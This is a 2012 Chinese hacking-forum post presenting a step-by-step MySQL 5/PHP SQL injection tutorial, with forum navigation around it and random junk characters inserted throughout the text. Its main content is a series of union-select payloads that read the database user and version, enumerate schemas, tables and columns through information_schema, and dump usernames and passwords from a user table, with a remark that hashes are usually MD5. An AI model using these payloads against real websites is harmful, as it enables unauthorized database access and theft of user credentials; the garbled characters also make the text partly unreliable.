找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2118|回复: 0
打印 上一主题 下一主题

mysql盲注手册

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:27:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, B1 E4 G2 R# q" d( Y: `( Z教程内容:Mysql 5+php 注入$ W- q5 |$ U5 e8 P( |) Z+ g6 V

- f; F3 X, _5 O( F4 O- E: y0 D+ q; C$ w4 X' v7 A

, ~5 S/ T" s3 W* n7 O  V; n5 T% q一.查看MYSQL基本信息(库名,版本,用户)
4 @' B& {, ]9 _  p9 q" w
5 g* t* w+ `, e$ @and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*8 w8 Y6 {! Z; |0 o. q( x) n7 R
* p4 ^8 K) u: W/ A
二.查数据库
# n" ]# v- J8 ?, }$ z* n
0 C7 a0 w9 a) w7 {" j) w1 Eand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*
9 c3 D( k. j2 s2 A2 Q, Ulimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。" k& q  \' d2 N, |: k. _
% `! Y( S; q1 I) A1 U
三.暴表+ t+ x) Y3 F/ }5 r& C& q+ p( U
$ t' c; m' @: r4 D1 B+ X0 \/ W/ w' S
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
! Z7 K. I/ a" z" ?0 d. }
8 k7 v& ?2 o1 {: |* f( a: t$ Hlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。  H7 z3 O( |7 Y

( f1 Z8 C" f) {* a5 F& C四.暴字段
6 [' X/ [: s2 X' A* C, k; _7 Y7 }: v7 q7 X6 Y
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*6 e- ^5 M0 h+ W: v& N, C
6 ]1 w9 P. y* _& e! |9 m6 \/ P
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。0 ^5 J  [# m& q& |
% J. J1 i1 K6 d7 u& m
五.暴数据6 E$ J2 v0 b% h/ g: p

3 w; u! V0 |4 P0 Y% xand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
; N  P; ]' ~5 `$ D  E1 w  \* V: N2 ?+ `5 M
. r& Z8 Z3 [; P  s9 m
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。" h7 t( J- y7 s2 W! l( r) `; b* Y3 `# w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表